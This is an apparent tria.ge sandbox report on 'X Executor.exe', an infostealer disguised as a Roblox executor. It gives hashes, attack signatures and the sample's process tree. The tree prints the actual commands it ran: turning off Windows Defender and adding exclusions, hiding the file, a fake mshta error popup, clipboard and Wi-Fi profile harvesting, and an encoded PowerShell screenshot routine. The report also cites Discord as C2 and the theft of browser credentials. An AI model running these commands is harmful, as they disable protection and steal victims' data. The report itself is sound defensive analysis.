Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
39s -
max time network
38s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
18/08/2024, 13:50
Behavioral task
behavioral1
Sample
X Executor.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
X Executor.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
D�Ó�y.pyc
Resource
win7-20240704-en
Behavioral task
behavioral4
Sample
D�Ó�y.pyc
Resource
win10v2004-20240802-en
General
-
Target
X Executor.exe
-
Size
7.4MB
-
MD5
6d90c40140099de5f0e9cd712908760e
-
SHA1
5570ae57076f2ab64833c6880d5f55b56fa47d29
-
SHA256
336fec7a946aad9d8f4039f3f329e94404529d8bffd7b2780a8ad747ab2f4e32
-
SHA512
1b217dddc644896f838c13a22357e3bd76c15a8a57847b2f09275252fe984df71cc74165c30838a2f08c66fe487bf9fcdf96b6d46154f6fda18574427972e82c
-
SSDEEP
98304:7tMcZurErvz81LpWjjUlLkvzgXO9hAlaYrzzuJZYJ1JIuIdKU73bcgVowzW:7DurErvI9pWjgyvoaYrE41JIuIkoxG
Malware Config
Signatures
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
pid Process 4936 powershell.exe 4424 powershell.exe 1700 powershell.exe 3992 powershell.exe 2884 powershell.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts X Executor.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 4476 powershell.exe 912 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 4272 rar.exe -
Loads dropped DLL 17 IoCs
pid Process 4680 X Executor.exe 4680 X Executor.exe 4680 X Executor.exe 4680 X Executor.exe 4680 X Executor.exe 4680 X Executor.exe 4680 X Executor.exe 4680 X Executor.exe 4680 X Executor.exe 4680 X Executor.exe 4680 X Executor.exe 4680 X Executor.exe 4680 X Executor.exe 4680 X Executor.exe 4680 X Executor.exe 4680 X Executor.exe 4680 X Executor.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x000700000002345b-21.dat upx behavioral2/memory/4680-25-0x00007FFE851C0000-0x00007FFE857B0000-memory.dmp upx behavioral2/files/0x000700000002344d-28.dat upx behavioral2/memory/4680-30-0x00007FFE98F70000-0x00007FFE98F94000-memory.dmp upx behavioral2/files/0x0007000000023454-47.dat upx behavioral2/memory/4680-48-0x00007FFE9C170000-0x00007FFE9C17F000-memory.dmp upx behavioral2/files/0x0007000000023453-46.dat upx behavioral2/files/0x0007000000023452-45.dat upx behavioral2/files/0x0007000000023451-44.dat upx behavioral2/files/0x0007000000023450-43.dat upx behavioral2/files/0x000700000002344f-42.dat upx behavioral2/files/0x000700000002344e-41.dat upx behavioral2/files/0x000700000002344c-40.dat upx behavioral2/files/0x0007000000023460-39.dat upx behavioral2/files/0x000700000002345f-38.dat upx behavioral2/files/0x000700000002345e-37.dat upx behavioral2/files/0x000700000002345a-34.dat upx behavioral2/files/0x0007000000023458-33.dat upx behavioral2/files/0x0007000000023459-29.dat upx behavioral2/memory/4680-54-0x00007FFE98320000-0x00007FFE9834D000-memory.dmp upx behavioral2/memory/4680-56-0x00007FFE991A0000-0x00007FFE991B9000-memory.dmp upx behavioral2/memory/4680-58-0x00007FFE94FD0000-0x00007FFE94FF3000-memory.dmp upx behavioral2/memory/4680-60-0x00007FFE948F0000-0x00007FFE94A66000-memory.dmp upx behavioral2/memory/4680-62-0x00007FFE95040000-0x00007FFE95059000-memory.dmp upx behavioral2/memory/4680-64-0x00007FFE98D60000-0x00007FFE98D6D000-memory.dmp upx behavioral2/memory/4680-66-0x00007FFE94EF0000-0x00007FFE94F23000-memory.dmp upx behavioral2/memory/4680-71-0x00007FFE94660000-0x00007FFE9472D000-memory.dmp upx behavioral2/memory/4680-70-0x00007FFE851C0000-0x00007FFE857B0000-memory.dmp upx behavioral2/memory/4680-73-0x00007FFE84880000-0x00007FFE84DA9000-memory.dmp upx behavioral2/memory/4680-74-0x00007FFE98F70000-0x00007FFE98F94000-memory.dmp upx behavioral2/memory/4680-78-0x00007FFE98BE0000-0x00007FFE98BED000-memory.dmp upx behavioral2/memory/4680-80-0x00007FFE94400000-0x00007FFE9451C000-memory.dmp upx behavioral2/memory/4680-76-0x00007FFE94ED0000-0x00007FFE94EE4000-memory.dmp upx behavioral2/memory/4680-92-0x00007FFE94FD0000-0x00007FFE94FF3000-memory.dmp upx behavioral2/memory/4680-110-0x00007FFE948F0000-0x00007FFE94A66000-memory.dmp upx behavioral2/memory/4680-184-0x00007FFE95040000-0x00007FFE95059000-memory.dmp upx behavioral2/memory/4680-275-0x00007FFE94EF0000-0x00007FFE94F23000-memory.dmp upx behavioral2/memory/4680-285-0x00007FFE94660000-0x00007FFE9472D000-memory.dmp upx behavioral2/memory/4680-294-0x00007FFE84880000-0x00007FFE84DA9000-memory.dmp upx behavioral2/memory/4680-315-0x00007FFE851C0000-0x00007FFE857B0000-memory.dmp upx behavioral2/memory/4680-321-0x00007FFE948F0000-0x00007FFE94A66000-memory.dmp upx behavioral2/memory/4680-316-0x00007FFE98F70000-0x00007FFE98F94000-memory.dmp upx behavioral2/memory/4680-330-0x00007FFE851C0000-0x00007FFE857B0000-memory.dmp upx behavioral2/memory/4680-343-0x00007FFE98BE0000-0x00007FFE98BED000-memory.dmp upx behavioral2/memory/4680-355-0x00007FFE94660000-0x00007FFE9472D000-memory.dmp upx behavioral2/memory/4680-354-0x00007FFE94EF0000-0x00007FFE94F23000-memory.dmp upx behavioral2/memory/4680-353-0x00007FFE98D60000-0x00007FFE98D6D000-memory.dmp upx behavioral2/memory/4680-352-0x00007FFE95040000-0x00007FFE95059000-memory.dmp upx behavioral2/memory/4680-351-0x00007FFE948F0000-0x00007FFE94A66000-memory.dmp upx behavioral2/memory/4680-350-0x00007FFE94FD0000-0x00007FFE94FF3000-memory.dmp upx behavioral2/memory/4680-349-0x00007FFE991A0000-0x00007FFE991B9000-memory.dmp upx behavioral2/memory/4680-348-0x00007FFE98320000-0x00007FFE9834D000-memory.dmp upx behavioral2/memory/4680-347-0x00007FFE9C170000-0x00007FFE9C17F000-memory.dmp upx behavioral2/memory/4680-346-0x00007FFE98F70000-0x00007FFE98F94000-memory.dmp upx behavioral2/memory/4680-345-0x00007FFE84880000-0x00007FFE84DA9000-memory.dmp upx behavioral2/memory/4680-344-0x00007FFE94400000-0x00007FFE9451C000-memory.dmp upx behavioral2/memory/4680-342-0x00007FFE94ED0000-0x00007FFE94EE4000-memory.dmp upx -
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 38 discord.com 39 discord.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 9 ip-api.com 36 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 5 IoCs
pid Process 4316 tasklist.exe 2668 tasklist.exe 4060 tasklist.exe 4676 tasklist.exe 3168 tasklist.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
pid Process 2472 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2968 cmd.exe 2252 PING.EXE -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 2460 cmd.exe 4816 netsh.exe -
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1528 WMIC.exe 4456 WMIC.exe 2908 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 2824 systeminfo.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2252 PING.EXE -
Suspicious behavior: EnumeratesProcesses 26 IoCs
pid Process 3992 powershell.exe 3992 powershell.exe 4936 powershell.exe 4936 powershell.exe 3992 powershell.exe 4936 powershell.exe 2884 powershell.exe 2884 powershell.exe 4476 powershell.exe 4476 powershell.exe 4476 powershell.exe 380 powershell.exe 380 powershell.exe 380 powershell.exe 4424 powershell.exe 4424 powershell.exe 4424 powershell.exe 3836 powershell.exe 3836 powershell.exe 3836 powershell.exe 1700 powershell.exe 1700 powershell.exe 1700 powershell.exe 2044 powershell.exe 2044 powershell.exe 2044 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4316 tasklist.exe Token: SeIncreaseQuotaPrivilege 1996 WMIC.exe Token: SeSecurityPrivilege 1996 WMIC.exe Token: SeTakeOwnershipPrivilege 1996 WMIC.exe Token: SeLoadDriverPrivilege 1996 WMIC.exe Token: SeSystemProfilePrivilege 1996 WMIC.exe Token: SeSystemtimePrivilege 1996 WMIC.exe Token: SeProfSingleProcessPrivilege 1996 WMIC.exe Token: SeIncBasePriorityPrivilege 1996 WMIC.exe Token: SeCreatePagefilePrivilege 1996 WMIC.exe Token: SeBackupPrivilege 1996 WMIC.exe Token: SeRestorePrivilege 1996 WMIC.exe Token: SeShutdownPrivilege 1996 WMIC.exe Token: SeDebugPrivilege 1996 WMIC.exe Token: SeSystemEnvironmentPrivilege 1996 WMIC.exe Token: SeRemoteShutdownPrivilege 1996 WMIC.exe Token: SeUndockPrivilege 1996 WMIC.exe Token: SeManageVolumePrivilege 1996 WMIC.exe Token: 33 1996 WMIC.exe Token: 34 1996 WMIC.exe Token: 35 1996 WMIC.exe Token: 36 1996 WMIC.exe Token: SeDebugPrivilege 3992 powershell.exe Token: SeDebugPrivilege 4936 powershell.exe Token: SeIncreaseQuotaPrivilege 1996 WMIC.exe Token: SeSecurityPrivilege 1996 WMIC.exe Token: SeTakeOwnershipPrivilege 1996 WMIC.exe Token: SeLoadDriverPrivilege 1996 WMIC.exe Token: SeSystemProfilePrivilege 1996 WMIC.exe Token: SeSystemtimePrivilege 1996 WMIC.exe Token: SeProfSingleProcessPrivilege 1996 WMIC.exe Token: SeIncBasePriorityPrivilege 1996 WMIC.exe Token: SeCreatePagefilePrivilege 1996 WMIC.exe Token: SeBackupPrivilege 1996 WMIC.exe Token: SeRestorePrivilege 1996 WMIC.exe Token: SeShutdownPrivilege 1996 WMIC.exe Token: SeDebugPrivilege 1996 WMIC.exe Token: SeSystemEnvironmentPrivilege 1996 WMIC.exe Token: SeRemoteShutdownPrivilege 1996 WMIC.exe Token: SeUndockPrivilege 1996 WMIC.exe Token: SeManageVolumePrivilege 1996 WMIC.exe Token: 33 1996 WMIC.exe Token: 34 1996 WMIC.exe Token: 35 1996 WMIC.exe Token: 36 1996 WMIC.exe Token: SeIncreaseQuotaPrivilege 1528 WMIC.exe Token: SeSecurityPrivilege 1528 WMIC.exe Token: SeTakeOwnershipPrivilege 1528 WMIC.exe Token: SeLoadDriverPrivilege 1528 WMIC.exe Token: SeSystemProfilePrivilege 1528 WMIC.exe Token: SeSystemtimePrivilege 1528 WMIC.exe Token: SeProfSingleProcessPrivilege 1528 WMIC.exe Token: SeIncBasePriorityPrivilege 1528 WMIC.exe Token: SeCreatePagefilePrivilege 1528 WMIC.exe Token: SeBackupPrivilege 1528 WMIC.exe Token: SeRestorePrivilege 1528 WMIC.exe Token: SeShutdownPrivilege 1528 WMIC.exe Token: SeDebugPrivilege 1528 WMIC.exe Token: SeSystemEnvironmentPrivilege 1528 WMIC.exe Token: SeRemoteShutdownPrivilege 1528 WMIC.exe Token: SeUndockPrivilege 1528 WMIC.exe Token: SeManageVolumePrivilege 1528 WMIC.exe Token: 33 1528 WMIC.exe Token: 34 1528 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1932 wrote to memory of 4680 1932 X Executor.exe 84 PID 1932 wrote to memory of 4680 1932 X Executor.exe 84 PID 4680 wrote to memory of 4328 4680 X Executor.exe 88 PID 4680 wrote to memory of 4328 4680 X Executor.exe 88 PID 4680 wrote to memory of 4996 4680 X Executor.exe 89 PID 4680 wrote to memory of 4996 4680 X Executor.exe 89 PID 4680 wrote to memory of 1864 4680 X Executor.exe 90 PID 4680 wrote to memory of 1864 4680 X Executor.exe 90 PID 4680 wrote to memory of 5076 4680 X Executor.exe 94 PID 4680 wrote to memory of 5076 4680 X Executor.exe 94 PID 4680 wrote to memory of 2040 4680 X Executor.exe 96 PID 4680 wrote to memory of 2040 4680 X Executor.exe 96 PID 5076 wrote to memory of 4316 5076 cmd.exe 98 PID 5076 wrote to memory of 4316 5076 cmd.exe 98 PID 4328 wrote to memory of 3992 4328 cmd.exe 99 PID 4328 wrote to memory of 3992 4328 cmd.exe 99 PID 2040 wrote to memory of 1996 2040 cmd.exe 100 PID 2040 wrote to memory of 1996 2040 cmd.exe 100 PID 4996 wrote to memory of 4936 4996 cmd.exe 101 PID 4996 wrote to memory of 4936 4996 cmd.exe 101 PID 1864 wrote to memory of 2304 1864 cmd.exe 102 PID 1864 wrote to memory of 2304 1864 cmd.exe 102 PID 4680 wrote to memory of 4072 4680 X Executor.exe 104 PID 4680 wrote to memory of 4072 4680 X Executor.exe 104 PID 4072 wrote to memory of 2128 4072 cmd.exe 106 PID 4072 wrote to memory of 2128 4072 cmd.exe 106 PID 4680 wrote to memory of 492 4680 X Executor.exe 107 PID 4680 wrote to memory of 492 4680 X Executor.exe 107 PID 492 wrote to memory of 504 492 cmd.exe 109 PID 492 wrote to memory of 504 492 cmd.exe 109 PID 4680 wrote to memory of 3040 4680 X Executor.exe 110 PID 4680 wrote to memory of 3040 4680 X Executor.exe 110 PID 3040 wrote to memory of 1528 3040 cmd.exe 175 PID 3040 wrote to memory of 1528 3040 cmd.exe 175 PID 4680 wrote to memory of 3380 4680 X Executor.exe 113 PID 4680 wrote to memory of 3380 4680 X Executor.exe 113 PID 3380 wrote to memory of 4456 3380 cmd.exe 162 PID 3380 wrote to memory of 4456 3380 cmd.exe 162 PID 4680 wrote to memory of 2472 4680 X Executor.exe 116 PID 4680 wrote to memory of 2472 4680 X Executor.exe 116 PID 4680 wrote to memory of 2308 4680 X Executor.exe 117 PID 4680 wrote to memory of 2308 4680 X Executor.exe 117 PID 2472 wrote to memory of 796 2472 cmd.exe 120 PID 2472 wrote to memory of 796 2472 cmd.exe 120 PID 2308 wrote to memory of 2884 2308 cmd.exe 121 PID 2308 wrote to memory of 2884 2308 cmd.exe 121 PID 4680 wrote to memory of 1664 4680 X Executor.exe 122 PID 4680 wrote to memory of 1664 4680 X Executor.exe 122 PID 4680 wrote to memory of 1860 4680 X Executor.exe 123 PID 4680 wrote to memory of 1860 4680 X Executor.exe 123 PID 1664 wrote to memory of 2668 1664 cmd.exe 126 PID 1664 wrote to memory of 2668 1664 cmd.exe 126 PID 1860 wrote to memory of 4060 1860 cmd.exe 128 PID 1860 wrote to memory of 4060 1860 cmd.exe 128 PID 4680 wrote to memory of 3808 4680 X Executor.exe 129 PID 4680 wrote to memory of 3808 4680 X Executor.exe 129 PID 4680 wrote to memory of 912 4680 X Executor.exe 130 PID 4680 wrote to memory of 912 4680 X Executor.exe 130 PID 4680 wrote to memory of 1804 4680 X Executor.exe 133 PID 4680 wrote to memory of 1804 4680 X Executor.exe 133 PID 4680 wrote to memory of 1512 4680 X Executor.exe 135 PID 4680 wrote to memory of 1512 4680 X Executor.exe 135 PID 3808 wrote to memory of 4236 3808 cmd.exe 136 PID 3808 wrote to memory of 4236 3808 cmd.exe 136 -
Views/modifies file attributes 1 TTPs 3 IoCs
pid Process 796 attrib.exe 4384 attrib.exe 1700 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\X Executor.exe"C:\Users\Admin\AppData\Local\Temp\X Executor.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1932 -
C:\Users\Admin\AppData\Local\Temp\X Executor.exe"C:\Users\Admin\AppData\Local\Temp\X Executor.exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4680 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\X Executor.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:4328 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\X Executor.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3992
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:4996 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4936
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Roblox has updated, X executor has not.', 0, 'Error', 0+16);close()""3⤵
- Suspicious use of WriteProcessMemory
PID:1864 -
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Roblox has updated, X executor has not.', 0, 'Error', 0+16);close()"4⤵PID:2304
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:5076 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4316
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1996
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵
- Suspicious use of WriteProcessMemory
PID:4072 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵PID:2128
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵
- Suspicious use of WriteProcessMemory
PID:492 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵PID:504
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:3040 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:1528
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:3380 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:4456
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\X Executor.exe""3⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:2472 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Temp\X Executor.exe"4⤵
- Views/modifies file attributes
PID:796
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:2308 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2884
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:1664 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:2668
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:1860 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:4060
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:3808 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵PID:4236
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:912 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:4476
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:1804
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:4676
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:1512
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:556
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2460 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4816
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:1952
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:2824
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵PID:2176
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:5060
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAA